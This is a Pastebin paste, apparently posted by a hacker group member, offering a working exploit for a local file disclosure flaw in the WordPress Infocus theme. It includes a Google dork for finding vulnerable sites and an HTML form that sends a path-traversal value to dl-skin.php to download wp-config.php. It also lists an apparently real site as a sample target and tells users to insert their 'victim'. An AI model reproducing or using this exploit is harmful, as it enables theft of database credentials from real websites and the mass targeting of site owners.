Guest User

WordPress Infocus Local File Disclosure 0day [XM-HACK]

a guest
Jul 28th, 2014
333
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.45 KB | None | 0 0
  1. #########################################################
  2. # Exploit Title: WordPress Infocus Local File Disclosure
  3. # Google Dork: inurl:"/wp-content/themes/infocus/"
  4. # Date: 28/07/2014
  5. # Exploit Author: XM-HACK
  6. # Facebook : http://www.facebook.com/XMehdiHack2
  7. # Vendor Homepage: www.wordpress.org
  8. # Version: All Version
  9. # Tested on: Win 7 - Kali
  10. #########################################################
  11.  
  12. Exploit :
  13.  
  14. POST
  15.  
  16. File Infected : http://localhost:80/wordpress/wp-content/themes/infocus/lib/scripts/dl-skin.php
  17.  
  18.  
  19. <html><title>Infocus Local File Disclosure [ XM-HACK] </title>
  20. <!-- This Exploit Founded By XM-HACK -->
  21. <style>
  22. html, body { background: black; }
  23. .XM { background: gray;border-color:black;color:#eee; }
  24. </style>
  25. <center><br><br><br>
  26. <body>
  27. <form action="http://127.0.0.1/wp-content/themes/infocus/lib/scripts/dl-skin.php" method="post"> <!-- Here Put Your Victim :D -->
  28. <font face=impact color=white>| Download |</font><br><br><input class="XM" type="text" name="_mysite_download_skin" value="../../../../../wp-config.php"><br><br>
  29. <input type="submit" value="XM-HACK" class="XM">
  30. </form>
  31. <br><br><font face=impact color=#eee>Fb.com/XMehdiHack2</font><br><font color=white size=2>inurl:"/wp-content/themes/infocus/"</font>
  32. <br><br><font color=white size=2>http://l9lawiii.co.il/wp-content/themes/infocus/lib/scripts/dl-skin.php</font>
  33. </body></html>
  34.  
  35.  
  36. Greetz To : AnonGhost Members - International Force Team - All Muslims Hackers
Add Comment
Please, Sign In to add comment